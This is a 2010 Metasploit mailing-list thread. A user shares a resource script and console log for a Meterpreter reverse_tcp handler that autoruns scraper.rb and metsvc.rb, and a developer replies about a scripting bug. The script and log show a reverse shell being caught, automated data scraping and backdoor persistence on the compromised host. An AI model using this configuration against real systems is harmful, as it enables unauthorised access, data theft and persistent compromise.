Metasploit mailing list archives

Re: multiscript problems?


From: Carlos Perez <carlos_perez () darkoperator com>
Date: Sun, 7 Mar 2010 20:51:34 -0400

in fact you are using the script correctly, I believe there has been some changes to the Meterpreter scripting code, I 
will take a look at it 

On Mar 7, 2010, at 8:17 PM, ricky-lee birtles wrote:

Is there somthing up with multiscript .rb or is there somthing I am doing wrong?


usr@endure:~/tools/msf3-dev$ cat Multi_2.rc
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 77.97.189.69
set LPORT 443
set AutoRunScript multiscript.rb -s tmp.lst
exploit -j

usr@endure:~/tools/msf3-dev$ cat tmp.lst
scraper.rb
metsvc.rb -A
usr@endure:~/tools/msf3-dev$
usr@endure:~/tools/msf3-dev$ sudo ./msfconsole -r Multi_2.rc

               ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                     ##


      =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 530 exploits - 248 auxiliary
+ -- --=[ 196 payloads - 23 encoders - 8 nops
      =[ svn r8735 updated today (2010.03.07)

resource (Multi_2.rc)> use exploit/multi/handler
resource (Multi_2.rc)> set ExitOnSession false
ExitOnSession => false
resource (Multi_2.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (Multi_2.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (Multi_2.rc)> set LPORT 443
LPORT => 443
resource (Multi_2.rc)> set AutoRunScript multiscript.rb -s tmp.lst
AutoRunScript => multiscript.rb -s tmp.lst
resource (Multi_2.rc)> exploit -j
[*] Exploit running as background job.

[-] Handler failed to bind to 77.97.189.69:443
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.10.1:443 -> 192.168.10.254:1075)
[*] Session ID 1 (192.168.10.1:443 -> 192.168.10.254:1075) processing
AutoRunScript 'multiscript.rb -s tmp.lst'
[*] Running Multiscript script.....
[*] Running script List ...
[*]     running script scraper.rb
[-] Error: NoMethodError undefined method `each_with_index' for
#<Binding:0x7fb4507991c0>
[-] Error in script: scraper.rb

[*]     running script metsvc.rb -A
[-] Error: NoMethodError undefined method `each_with_index' for
#<Binding:0x7fb450785df0>
[-] Error in script: metsvc.rb -A


msf exploit(handler) >


Regards,
-- Mr R Birtles
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: